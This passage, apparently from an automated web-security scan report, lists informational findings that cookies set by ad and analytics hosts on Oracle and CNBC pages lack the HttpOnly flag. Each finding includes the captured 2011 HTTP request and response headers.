Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    rdk
    rdk15
    ses15
    csi15

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.html?defaulting_ad=x26f73f.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315339138505&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fwww.cnbc.com%2Fid%2F15838394
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^7; csi15=2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 14:59:04 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 15:59:04 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^7; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=61255; path=/; domain=.rubiconproject.com
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: csi15=1295121.js^2^1315321144^1315321144&2553663.js^4^1315321038^1315321139&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451; expires=Tue, 13-Sep-2011 14:59:04 GMT; max-age=604800; path=/; domain=.rubiconproject.com;
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 1968

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

13.118. http://optimized-by.rubiconproject.com/a/dk.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://optimized-by.rubiconproject.com
Path:   /a/dk.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    rdk
    rdk15
    ses15

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /a/dk.js?defaulting_ad=x13d7d2.js&size_id=15&account_id=6451&site_id=11953&size=300x250 HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/677/cnbc/300x250/atf?t=1315340154901&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=UniversalAudiencePlatform23.com&refer=http%3A%2F%2Fdata.cnbc.com%2Fquotes%2F.DJIA
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%264210%3D1%267259%3D1%267249%3D1; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^4^1315320939^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; ses2=9844^2&11953^1; csi2=1295153.js^1^1315321061^1315321061&638178.js^2^1315313134^1315313452&3172565.js^2^1315313133^1315313452; rdk=6451/11953; rdk15=0; ses15=9844^2&11953^10; csi15=1300434.js^1^1315322155^1315322155&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025&638177.js^2^1315313132^1315313451

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:15:56 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=6451/11953; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=2; expires=Tue, 06-Sep-2011 16:15:56 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=9844^2&11953^10; expires=Wed, 07-Sep-2011 05:59:59 GMT; max-age=60243; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: application/x-javascript
Content-Length: 1712

rubicon_cb = Math.random(); rubicon_rurl = document.referrer; if(top.location==document.location){rubicon_rurl = document.location;} rubicon_rurl = escape(rubicon_rurl);
window.rubicon_ad = "3158455"
...[SNIP]...

13.119. http://oracle.112.2o7.net/b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracle.112.2o7.net
Path:   /b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

    s_vi

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /b/ss/oracleopenworld,oraclecom,oracleglobal/1/H.23.3/s09989644403103?AQB=1&ndh=1&t=6%2F8%2F2011%2015%3A58%3A21%202%20300&ce=UTF-8&ns=oracle&pageName=oow2011%3Aen-us%3A%2Fcontact%2F&g=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html&r=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html&cc=USD&ch=Oracle%20OpenWorld%3A%202011&c20=D%3Dv20&v20=New&c24=D%3Dv24&v24=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Ftools%2Fmobile%2Findex.html&c26=D%3Dv26&v26=oow2011%3Aen&v36=Oracle%20OpenWorld%3A%202011&c38=D%3DpageName&c39=D%3DpageName&c50=D%3Ds_vi&v50=D%3Ds_vi&c51=ora_code%3A1.37%3AH23.3&h1=http%3A%2F%2Fwww.oracle.com%2Fopenworld%2Fcontact%2Findex.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava(TM)%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracle.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/openworld/contact/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733218685011339-40000104A014EEDE|4E66430C[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733218685011339-40000104A014EEE0|4E66430C[CE]; s_vi=[CS]v1|2733210E05159EC1-40000176A0000B4C|fx7Bhjeljfd|2733211C85012E40-60000109C00668AA|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|x60x7Dnlcjx60x7Fjaxxx60x7Dck|2733218685011339-40000104A014EEE2[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:58:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_fx7Bhjeljfd=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=oracle.112.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=; Expires=Wed, 30 Jun 1993 20:00:00 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi=[CS]v1|2733218E05162BCA-60000182E00125F7|cx7Emox60ikx60cnmx60|2733211C85012E40-60000109C00668A7|fx7Bhjeljfd|2733218685011339-40000104A014EEE0[CE]; Expires=Sun, 4 Sep 2016 15:58:25 GMT; Domain=oracle.112.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:58:25 GMT
Last-Modified: Wed, 07 Sep 2011 15:58:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664321-4785-7DF25DAF"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www415
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.120. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    s_vi_cx7Emox60ikx60cnmx60
    s_vi_fx7Bhjeljfd
    s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06861332259140?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A25%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss%2Bfaq%2Bhelp%2Bcontact%2Bphone&r=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&cc=USD&c5=xss%20faq%20help%20contact%20phone&c20=New&v20=New&v24=http%3A//www.oracle.com/openworld/register/packages/index.html%3Fsrc%3D7013425%26Act%3D226&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss+faq+help+contact+phone
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:25 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211885011D66-6000010A20474AFC|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211885011D66-6000010A20474AFF|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|2733211885011D66-6000010A20474B01|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:25 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:25 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:25 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664231-3A57-2150C7DC"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www81
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.121. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    s_vi_cx7Emox60ikx60cnmx60
    s_vi_fx7Bhjeljfd
    s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom,oracleopenworld/1/H.19.4/s06987638163845?AQB=1&ndh=1&t=6/8/2011%2015%3A58%3A5%202%20300&pageName=Search%3A%20OpenWorld%3A%20No%20Results&g=http%3A//search.oracle.com/search/search%3Fstart%3D1%26search_p_main_operator%3Dall%26group%3DOracle%2BOpenWorld%26q%3Dxss&r=http%3A//www.oracle.com/openworld/tools/mobile/index.html&cc=USD&c5=xss&c20=New&v20=New&c24=no%20value&v24=http%3A//www.oracle.com/openworld/tools/mobile/index.html&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?start=1&search_p_main_operator=all&group=Oracle+OpenWorld&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:58:06 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|27332187050132C6-400001166006E825|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_x60x7Dnlcjx60x7Fjaxxx60x7Dck=[CS]v4|273321188501292D-6000010B004C6452|4E66430C[CE]; Expires=Sun, 4 Sep 2016 15:58:06 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:58:06 GMT
Last-Modified: Wed, 07 Sep 2011 15:58:06 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66430E-6576-4E5300FE"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www179
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.122. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    s_vi_cx7Emox60ikx60cnmx60
    s_vi_fx7Bhjeljfd

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s0546489411499?AQB=1&ndh=1&t=6/8/2011%2015%3A56%3A13%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&v24=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26btnSearch%3DSearch&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Results&pidt=1&oid=javascript%3AsearchDuplicateLink%281%2C10%2C482523%29%3B&ot=A&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:56:14 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:56:14 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:56:14 GMT
Last-Modified: Wed, 07 Sep 2011 15:56:14 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E66429E-469A-637CA977"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www107
Content-Length: 43
Content-Type: image/gif

GIF89a.............!.......,............Q.;

13.123. http://oracleglobal.112.2o7.net/b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

Summary

Severity:   Information
Confidence:   Certain
Host:   http://oracleglobal.112.2o7.net
Path:   /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

    s_vi_cx7Emox60ikx60cnmx60
    s_vi_fx7Bhjeljfd

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b/ss/oracleglobal,oraclecom/1/H.19.4/s06851990474388?AQB=1&ndh=1&t=6/8/2011%2015%3A54%3A46%202%20300&pageName=Search%3A%20All%3A%20Results&g=http%3A//search.oracle.com/search/search%3Fsearch.timezone%3D300%26search_startnum%3D%26search_endnum%3D%26num%3D10%26search_dupid%3D%26exttimeout%3Dfalse%26group%3DAll%26q%3Dsql%2Bsyntax%2Bhelp%26search_p_main_operator%3Dall%26search_p_atname%3D%26search_p_op%3Dequals%26search_p_val%3D%26search_p_atname%3D%26sear&r=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&cc=USD&c4=sql%20syntax%20help&c6=1&c20=New&v20=New&c24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&v24=http%3A//search.oracle.com/search/search%3Fdefault%3Dtrue%26keyword%3Dphone%26start%3D1%26nodeid%3D%26fid%3D%26showSimilarDoc%3Dtrue%26group%3DAll&s=1920x1200&c=16&j=1.6&v=Y&k=Y&bw=1266&bh=909&p=Shockwave%20Flash%3BQuickTime%20Plug-in%207.7%3BJava%20Deployment%20Toolkit%206.0.260.3%3BJava%28TM%29%20Platform%20SE%206%20U26%3BSilverlight%20Plug-In%3BMicrosoft%20Office%202010%3BChrome%20PDF%20Viewer%3BGoogle%20Earth%20Plugin%3BGoogle%20Updater%3BGoogle%20Update%3BiTunes%20Application%20Detector%3BWPI%20Detector%201.4%3BDefault%20Plug-in%3B&pid=Search%3A%20All%3A%20Query&pidt=1&oid=Search&oidt=3&ot=SUBMIT&AQE=1 HTTP/1.1
Host: oracleglobal.112.2o7.net
Proxy-Connection: keep-alive
Referer: http://search.oracle.com/search/search?search.timezone=300&search_startnum=&search_endnum=&num=10&search_dupid=&exttimeout=false&group=All&q=sql+syntax+help&search_p_main_operator=all&search_p_atname=&search_p_op=equals&search_p_val=&search_p_atname=&search_p_op=equals&search_p_val=&btnSearch=Search
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_x60bafx7Bzx7Djx21x7Cax7Fncc=[CS]v4|272F18FF05010599-4000010960230D66|4E5E718E[CE]; s_vi_ax60sji=[CS]v4|272FD7BC85162345-400001A0C03A9C55|4E5FAF78[CE]; s_vi_efhcjygdx7Fx7Fn=[CS]v4|273164FE850113DC-40000109C022AF4B|4E62C9FC[CE]; s_vi_bax7Fmox7Emaibxxc=[CS]v4|2731656D85013995-4000010FA019802E|4E62CAD6[CE]; s_vi_hizx7Dx7Bix7Fxxjyx60x60=[CS]v4|2732F4C385012B37-4000010D6023C03D|4E65E986[CE]; s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:54:47 GMT
Server: Omniture DC/2.0.0
Set-Cookie: s_vi_cx7Emox60ikx60cnmx60=[CS]v4|2733211C85012E40-60000109C00668A7|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
Set-Cookie: s_vi_fx7Bhjeljfd=[CS]v4|2733211C85012E40-60000109C00668AA|4E664230[CE]; Expires=Sun, 4 Sep 2016 15:54:47 GMT; Domain=.2o7.net; Path=/
X-C: ms-4.4.1
Expires: Mon, 05 Sep 2011 15:54:47 GMT
Last-Modified: Wed, 07 Sep 2011 15:54:47 GMT
Cache-Control: no-cache, no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform, private
Pragma: no-cache
ETag: "4E664247-443F-7E91E57E"
Vary: *
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID PSA OUR IND COM NAV STA"
xserver: www33
Content-Length: 43
